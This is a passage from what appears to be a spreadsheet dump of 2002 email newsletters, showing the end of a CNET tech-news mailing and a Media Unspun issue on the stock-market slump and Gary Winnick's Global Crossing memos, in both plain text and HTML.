 &lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK8vC56PpQktQ3DlPfP8N4R"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href="http://clickthru.online.com/Click?q=43-coL5IBJAEL-kllS9Z5VKc-3P0BcR"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href="http://clickthru.online.com/Click?q=59-y53oIEnthwPksNglpW-B_KMqztFR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES2GdKeb4QA5K-fxuEL59R"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href="http://clickthru.online.com/Click?q=83-U-BXQYJ7lcSbjgVtuoAABMMPZ9rR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_zabLfI7slCW5CH7esbKRiR"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href="http://clickthru.online.com/Click?q=ad-_4IAQzEB4q40-34QhaIHsSzky0PR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7XTPmn4gVnxXFZcIuInR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkVXgKk79RmBekeVktk2eR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=ec-MHyXQVy2A7TvhPk1kOqFb2GVaGyR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-SBgl8-_XGuwrfzJ6nnR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=17-agitI5XrfGR04bnIz4s1RhjGRseR"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src="http://news.cnet.com/i/ne/bb/2002/07/0710_e911.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0D7TBv2bHc-r7MBvWpjuyR" &gt;Tech hurdles ahead for e911&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Correspondent Melissa Francis looks at the technology hurdles facing wireless carriers in launching the second phase of the e911 initiative by October.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImb5QL1fU5CfCkxHB0FFR" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9S0vBFErctPQDwwaMC9R"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href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwpPGOOK80ywQ-4d0P6cR" &gt;
 'Father of Pentium' sets up India VC fund&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0Kir7FT6IoaDkjVsTLZ8iR" &gt;
 EMC lures HP exec to technology post&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJorh5tror1yZeU_u_KnPR" &gt;
 Japan's major chipmakers join forces&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr2MfO_1FWLXZBXqONOVnR" &gt;
 Stocks tumble to new lows&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=bf-JtRfQ8ZrsdJpab45w8PF_jEuwteR" &gt;
 Expedia snubs parent company's bid&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1asN7b22HCu4jNix1DPPR" &gt;
 Earnings alert: Yahoo back in black&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4N6jvQHzAwQ4lAUw-5WnR" &gt;
 KPN says it will unplug KPNQwest network&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4ei4y6wnZxrhBm0WHtheR" &gt;
 Verizon to ask NorthPoint claim get tossed&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zaHLcycd8ZvQIzTKtR1yR" &gt;
 WorldCom won't pay MCI shareholders&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAHEkIeIdNyGEI9rCM8vlR" &gt;
 Lawmakers: Keep your tunes to yourself&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXe2TtxIN_7DQESNPe-i4R" &gt;
 Movielink: Bring on the experts&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6pnIzcAujHpx8lOheMncR" &gt;
 Web users ante up for games, classmates&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPhLuhI--ywvjsK-FdLPRR" &gt;
 Teen handheld maker wants to play&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPdjION5cUywq2NRJSBTZR" &gt;
 RIM files second suit against Good&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzTtqO1HwHzeFOPq1FsnynR" &gt;
 Gamers invade Army Web site&lt;/a&gt;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href="http://clickthru.online.com/Click?q=a8-02XZQQZk8cn8LHTDtZs6swzdONiR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=bd-c0rUrzpL9LD7ntDzAE_s0Q2tgSy3-9RR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULwlG7cAla3Gl22vbAOyenR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXfH-IRb_VqS8CMB0qvseR"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href="http://clickthru.online.com/Click?q=fc-WpHmQVwF4FRLGpea9-0t3VVat9yR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4W8ZmUp2X3VynhNBuCqlR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHfePLOYsBBBkqU8niQ74R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdHJgbdWEyFPcZsjpRp-LrR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPuvTFhbjJlh9GpMUHM3FR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDCiXgO-lWhKPAKa1CPIuR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e433&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=7c-7N6ZnFW8c3KmBTvyE3Kh2RYFZRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format...
 ------------=_1033478774-12610-4
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 To view this newsletter in full-color, visit:
 http://newsletter.mediaunspun.com/index000021074.cfm
 Media Unspun
 What the Press is Reporting and Why (www.mediaunspun.com)
 -----------------------------------------------------------------
 October 1, 2002
 -----------------------------------------------------------------
 IN THIS ISSUE
 -----------------------------------------------------------------
 * MARKET CAN'T FIND ITS BOTTOM WITH BOTH HANDS
 * WINNICK: HANDS-OFF OR RED-HANDED?
 * OTHER STORIES
 -----------------------------------------------------------------
 EDITOR'S NOTE
 -----------------------------------------------------------------
 Is Media Unspun useful to you? Then pass it on to a colleague.
 The more readers we have, the more successful we'll be. The more 
 successful we are, the more useful we can be to you. Pass it
 on!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MARKET CAN'T FIND ITS BOTTOM WITH BOTH HANDS
 -----------------------------------------------------------------
 Remember when Nasdaq 2500 seemed impossibly low? Welcome back to 
 cruel reality. These days, with few analysts willing to call a
 market bottom, financial reporters outdo each other with dire
 assessments of how bad things are and how much worse they can
 get. Maybe Morrissey should do a concert on Wall Street; the
 self-pity can't get much worse.
 The markets' closing numbers were the same in every city, but
 you wouldn't know it from the headlines. It was the Dow's worst
 monthly performance in four years, said MSNBC. "3rd quarter
 worst for stocks since '87," read the Denver Post, repeating a
 popular figure reached by tallying the Dow and S&amp;P's percentage
 losses. The New York Daily News counted percentage losses for
 the month only and declared it the worst September since 1937.
 Everyone predicted a lousy September 2002, so the phrase
 "self-fulfilling prophecy" does spring to mind. 
 So does the phrase "gloom and doom." "Every day for the last
 three months, the market has erased $73 of wealth, including
 Saturdays, Sundays and holidays, for every person living in the
 United States," said the San Jose Mercury News. "Countless
 investors are starting to wonder if stocks will ever go up
 again," wrote USA Today. In a more plausible statement,
 TheStreet.com's Aaron Task said recent declines "demonstrated
 once again the folly of investors' repeated attempts to pinpoint 
 a bottom" and "disabuse(d) them of the idea that the best time
 to buy is when things look worst, if only because recent history 
 has shown stocks can go from terrible to awful and beyond." 
 OK, breathe. Go read the comics or something. Feeling better?
 Good, because there's more.
 The New York Post, in small enough words for everyone to
 understand, made the public service announcement "Beware!
 October Is A Very Bad Month For The Stock Market." And you
 shouldn't take candy from strangers, either. The Post's John
 Crudele, a market curmudgeon before it was in style, warned,
 "This market is very dangerous, even if things look like they
 couldn't get any worse." Detroit Free Press columnist Susan
 Tompor agreed that "the next round of statements could indeed
 look pretty nasty." 
 We have to agree: the stock market is bad. The economy is bad.
 It's going to get worse before it gets better, and that may take 
 a while. The "bottom" is, technically, zero. Be cautious, yes,
 but don't let the media's bipolar disorder ruin your day. Just
 like dot-coms weren't really a new economy, a bear market isn't
 the end of the world. - Jen Muehlbauer
 No Happy Endings in September 
 http://www.thestreet.com/markets/aarontaskfree/10045171.html
 Bear drags stocks deeply into den
 http://www.usatoday.com/money/markets/us/2002-09-30-bear-bottom_x.htm
 Market's September is worst since 1937 
 http://www.nydailynews.com/business/story/23183p-21985c.html
 Dow posts worst month in 4 years
 http://www.msnbc.com/news/534548.asp
 Market's Worst Quarter Since '87 Crash Limps to a Close
 http://www.nytimes.com/2002/10/01/business/01STOX.html
 For Dow and S&amp;P, Worst Quarter Since '87 
 http://www.washingtonpost.com/wp-dyn/articles/A24961-2002Sep30.html
 3rd quarter worst for stocks since '87 (Denver Post)
 http://tinyurl.com/1q3i
 Market's tumble persists, capping worst three months in 15
 years
 http://www.siliconvalley.com/mld/siliconvalley/4186771.htm
 Stock Market Quarterly Review
 http://online.wsj.com/page/0,,2_0861,00.html
 (Paid subscription required.)
 Beware! October Is A Very Bad Month For The Stock Market 
 http://www.nypost.com/business/58389.htm
 SUSAN TOMPOR: Bad news is, the beating isn't over yet 
 http://www.freep.com/money/business/tompor1_20021001.htm
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 What's Really Going on at Microsoft? Mary Jo Foley delivers
 unmatched reporting and insight with MICROSOFT WATCH.  Track
 initiatives like .Net, Palladium, Longhorn, Trinity, Yukon;
 release dates, competitive moves, people. For a FREE 14-day
 trial subscription:
 https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075
 -----------------------------------------------------------------
 WINNICK: HANDS-OFF OR RED-HANDED?
 -----------------------------------------------------------------
 Former Global Crossing chairman Gary Winnick will appear before
 a Congressional committee today. It won't be pretty. CNN
 predicted he will plead the Fifth. Most other outlets expected
 Winnick to testify.
 Impetus for all the coverage was yesterday's release by the
 House Energy and Commerce Committee of memos indicating that
 Winnick was in the thick of the company's suspect dealmaking. A
 committee spokesman said, "If he tries to portray himself as an
 out-of-the-loop ceremonial chairman, we intend to remind him
 that he is under oath."
 The memo that got most of the attention was one from then-CEO
 Leo Hindery to Winnick in June 2001. Hindery warned in colorful
 language that the company was heading for a fall. The Financial
 Times, Washington Post, and New York Times all ran a quote from
 the memo comparing telcos to salmon. Hindery urged Winnick to
 unload the company -- "without looking like we are shaking our
 bootie all over the world," quoted the two Timeses -- and
 resigned shortly thereafter.
 One little detail from the memos is guaranteed to make Winnick's 
 time under the television lights even more uncomfortable. Among
 the companies he used his influence with, to help close deals,
 was Enron. All the reports mentioned Enron, but the New York
 Times seemed to be alone in noting that Global Crossing never
 completed a deal with the fallen energy giant.
 The Wall Street Journal looked beyond the obviously embarrassing 
 details of the memos to point out that, despite such evidence,
 the gun might not be smoking yet. "Prosecutors would still need
 to prove that he knew the transactions were improper and used
 them mainly as a way of enriching himself by boosting the
 company's stock price artificially," the Journal reporters
 wrote. The AP noted that all of the memos were dated after
 Winnick's last sale of Global Crossing stock, $123 million in
 May 2001.
 Despite his $734 million in stock profits, Gary Winnick was not
 among the five telco executives being sued by New York attorney
 general Eliot Spitzer to return their ill-gotten gains. Is
 Spitzer betting, with the Journal, that Winnick might walk away
 clean? - Keith Dawson
 Global Crossing: What Did Winnick Know?
 http://www.cnn.com/2002/ALLPOLITICS/09/30/time.crossing.tm/
 Winnick Was Told Of Telecom Risks
 http://www.washingtonpost.com/wp-dyn/articles/A24886-2002Sep30.html
 Memo Indicates Global Crossing Chief Knew of Troubles
 http://www.nytimes.com/2002/10/01/business/01GLOB.html
 Global Crossing's Winnick Knew About Swap Deals
 http://online.wsj.com/article/0,,SB1033426396710785953,00.html
 (Paid subscription required)
 Documents show active role by Global Crossing chairman (AP)
 http://www.bayarea.com/mld/mercurynews/business/4187381.htm
 Suit Seeks IPO Profits From Five Executives
 http://www.washingtonpost.com/wp-dyn/articles/A24921-2002Sep30.html
 -----------------------------------------------------------------
 OTHER STORIES
 -----------------------------------------------------------------
 Fund giant Fidelity set to eliminate 1,695 jobs (Boston Globe)
 http://tinyurl.com/1q3h
 AOL Chairman's No. 1 Ally Turns Into His Biggest Foe
 http://www.nytimes.com/2002/10/01/technology/01AOL.html
 More living without benefits: Health insurance given less
 frequently at work  
 http://www.freep.com/money/business/insure30_20020930.htm
 Beware al-Qaida, Branch is on to you (Battle Creek Enquirer)
 http://tinyurl.com/1prs
 Hewlett-Packard and EMC Sue Each Other (Reuters)
 http://www.nytimes.com/reuters/technology/tech-tech-hewlett-emc.html
 Dealing With W
 http://www.nytimes.com/2002/10/01/opinion/01KRUG.html
 Broadband Disconnect
 http://www.washingtonpost.com/wp-dyn/articles/A21649-2002Sep30.html
 Judge Dismisses $800M Cell Phone-Brain Tumor Suit (AP)
 http://www.washingtonpost.com/wp-dyn/articles/A22712-2002Sep30.html
 Microsoft Puts Meat Behind Security Push
 http://www.eweek.com/article2/0,3959,561985,00.asp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Marketing: Cowpoke Productions (cowpokeproductions.com).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http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org
 To receive future messages in HTML format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Chtm
 To change your subscriber information, use this link:
 http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org
 ------------=_1033478774-12610-4
 Content-Type: text/html; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;title&gt;Media Unspun&lt;/title&gt;
 &lt;!--  
 **********************************************************
 If you can read this message but the rest of the email 
 contains strange characters, your email program is not
 capable of displaying HTML email. Use your browser to read the
 complete newsletter online at: 
    http://newsletter.mediaunspun.com/
 To receive future messages in plain text format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Ctxt
 **********************************************************
 CREATED: October 1, 2002 
 --&gt;
 &lt;meta name="description" content=""&gt;
 &lt;meta name="keywords" content=""&gt;
 &lt;meta name="GENERATOR" content="iMakeNews"&gt;
 &lt;meta name="robots" content="all"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;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.a274101923384032-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a274101923384032-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923384032-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a274101923384032-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923384032-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923384032-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923384032-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923384032-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a274101923384032-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923384032-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a274101923384032-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a274101923383480-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a274101923383480-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a274101923383480-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a274101923382079-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a274101923382079-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a274101923382079-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a274101923387038-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a274101923387038-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923387038-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a274101923387038-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923387038-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a274101923387038-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923387038-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923387038-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a274101923387038-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a274101923387038-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a274101923387038-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}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000021074.cfm&amp;XXDESXXissue_id=21074&amp;XXDESXXtitle=Media%20Unspun"
 			 class="a274101923384032-footer_tellafriend"&gt;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src="http://a298.g.akamai.net/7/298/5382/100102092338/www.imakenews.com/mediaunspun/mediaunspun_logo.GIF" BORDER="0" alt="Media Unspun"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Tuesday, October 1, 2002
 				&lt;/font&gt;
 			&lt;/td&gt;
 				&lt;td align="center" width="34%"&gt;
 			&lt;/td&gt;
 				&lt;td align="right" width="33%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 1 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table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HREF="#a97667"
 						class="a274101923383480-contents_article_title"
 				&gt;
 			Market Can't Find Its Bottom With Both Hands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HREF="#a97668"
 						class="a274101923382079-contents_article_title"
 				&gt;
 			Winnick: Hands-Off or Red-Handed?
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a97669"
 						class="a274101923382079-contents_article_title"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Editor's Note
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more successful we are, the more useful we can be to you. Pass it on!&lt;/P&gt;&lt;P&gt;
 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&lt;P&gt;Pop!Tech 2002&lt;br&gt;
 October 18 - 20, 2002: Camden, Maine&lt;br&gt;
 Join 500 big thinkers to discuss&lt;br&gt;
 the collision of technology and culture&lt;br&gt;
 Register now at: &lt;A HREF="http://www.poptech.org"&gt;http://www.poptech.org&lt;/A&gt; &lt;br&gt;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name="a97667"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Market Can't Find Its Bottom With Both Hands
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Remember when Nasdaq 2500 seemed impossibly low? Welcome back to cruel reality. These days, with few analysts willing to call a market bottom, financial reporters outdo each other with dire assessments of how bad things are and how much worse they can get. Maybe Morrissey should do a concert on Wall Street; the self-pity can't get much worse.&lt;/P&gt;&lt;P&gt;
 The markets' closing numbers were the same in every city, but you wouldn't know it from the headlines. It was the Dow's worst monthly performance in four years, said MSNBC. "3rd quarter worst for stocks since '87," read the Denver Post, repeating a popular figure reached by tallying the Dow and S&amp;P's percentage losses. The New York Daily News counted percentage losses for the month only and declared it the worst September since 1937. Everyone predicted a lousy September 2002, so the phrase
 "self-fulfilling prophecy" does spring to mind. &lt;/P&gt;&lt;P&gt;
 So does the phrase "gloom and doom." "Every day for the last three months, the market has erased $73 of wealth, including Saturdays, Sundays and holidays, for every person living in the United States," said the San Jose Mercury News. "Countless investors are starting to wonder if stocks will ever go up again," wrote USA Today. In a more plausible statement, TheStreet.com's Aaron Task said recent declines "demonstrated once again the folly of investors' repeated attempts to pinpoint a bottom"
 and "disabuse(d) them of the idea that the best time to buy is when things look worst, if only because recent history has shown stocks can go from terrible to awful and beyond." &lt;/P&gt;&lt;P&gt;
 OK, breathe. Go read the comics or something. Feeling better? Good, because there's more.&lt;/P&gt;&lt;P&gt;
 The New York Post, in small enough words for everyone to understand, made the public service announcement "Beware! October Is A Very Bad Month For The Stock Market." And you shouldn't take candy from strangers, either. The Post's John Crudele, a market curmudgeon before it was in style, warned, "This market is very dangerous, even if things look like they couldn't get any worse." Detroit Free Press columnist Susan Tompor agreed that "the next round of statements could indeed look pretty nasty." 
 &lt;/P&gt;&lt;P&gt;
 We have to agree: the stock market is bad. The economy is bad. It's going to get worse before it gets better, and that may take a while. The "bottom" is, technically, zero. Be cautious, yes, but don't let the media's bipolar disorder ruin your day. Just like dot-coms weren't really a new economy, a bear market isn't the end of the world. - Jen Muehlbauer&lt;/P&gt;&lt;P&gt;
 No Happy Endings in September &lt;br&gt;
 &lt;A HREF="http://www.thestreet.com/markets/aarontaskfree/10045171.html"&gt;http://www.thestreet.com/markets/aarontaskfree/10045171.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Bear drags stocks deeply into den&lt;br&gt;
 &lt;A HREF="http://www.usatoday.com/money/markets/us/2002-09-30-bear-bottom_x.htm"&gt;http://www.usatoday.com/money/markets/us/2002-09-30-bear-bottom_x.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Market's September is worst since 1937 &lt;br&gt;
 &lt;A HREF="http://www.nydailynews.com/business/story/23183p-21985c.html"&gt;http://www.nydailynews.com/business/story/23183p-21985c.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Dow posts worst month in 4 years&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/534548.asp"&gt;http://www.msnbc.com/news/534548.asp&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
